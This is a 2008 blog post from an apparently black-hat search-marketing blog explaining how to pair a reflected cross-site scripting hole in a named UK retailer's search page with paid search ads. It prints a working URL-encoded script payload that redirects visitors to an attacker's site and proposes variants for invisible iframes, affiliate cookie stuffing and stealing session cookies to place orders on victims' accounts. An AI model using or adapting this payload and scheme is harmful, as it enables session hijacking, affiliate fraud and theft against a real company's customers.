Mr. Greyhat | Adventures into the world of Search Marketing with Pay Per Click (PPC) and Search Engine Optimization (SEO)

XSS, Adwords, affiliates.

It’s fairly clear that the majority of people know about blackhat ppc affiliate techniques. But how can you take these a step further, were you so inclined..

The nature of this method lies in marrying two technologies together. The problem with XSS exploits is the lack of targeted visitors via your link. Current methods include sending high volumes of spam e-mail with an apparently valid link. They marry phishing with XSS. Then when someone bites, you clone their session. There are inherent flaws with this method.

Adwords allows you to direct cheap targeted traffic for a brand site, that you have discovered an xss exploit in. Lets take; for example - Viking Direct. A huge company and affiliate program.

You could hijack their brand ad with the following destination url:

http://www.viking-direct.co.uk/catalog/search.do?Ntt=%3Cscript%3Ewindow.location%3D%22http%3A%2F%2Fwww.yourdestinationurl.co.uk%22%3B%3C/script%3E&No=0&N=6&Ntk=all%7Call&Ntx=mode+matchpartialmax&Nty=1

What is the benefit? You can gain an appearance of authenticity, their brand ad is already domain directed. You could insert your own affiliate redirect. You could change the script and insert an invisible iframe to load whatever you wished. For example - Stuff cookies, lots of them.

Or grab a document.cookie - and log into someone elses sessions. Make orders on their account, buy yourself a tv. That sort of bad stuff.

Using adwords and XSS together is not currently being exploited probably because there is some vital knowledge that is required to pull this off. But let me tell you, it’s extremely easy. I could have fished hundreds of session ids this morning from Viking Direct were I so inclined and go get myself those fifty 60″ tvs that my house just really needs.

Childs play..

This entry was posted on Wednesday, August 6th, 2008 at 8:09 am and is filed under general ramblings. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

« Atlas vs. Google Conversion tracking, the percentage difference.
adCenter Desktop Beta.. »

Leave a Reply

  • Recent Posts

    • C# Project Euler
    • Quality Score about to change.
    • adCenter Desktop Beta..
    • XSS, Adwords, affiliates.
    • Atlas vs. Google Conversion tracking, the percentage difference.
  • Further reading..

    • Insider’s View
    • Matt Cutts Blog
    • PPC Blog
    • PPC Discussions
    • Search Engine Land
    • SEO Blackhat
    • SEOptimize
  • Archives

    • September 2008
    • August 2008
    • July 2008
    • June 2008
    • April 2008
    • March 2008
    • February 2008
    • January 2008
  •  

    August 2008
    M T W T F S S
    « Jul   Sep »
     123
    45678910
    11121314151617
    18192021222324
    25262728293031

Mr. Greyhat | Adventures into the world of Search Marketing with Pay Per Click (PPC) and Search Engine Optimization (SEO) is proudly powered by WordPress | Bob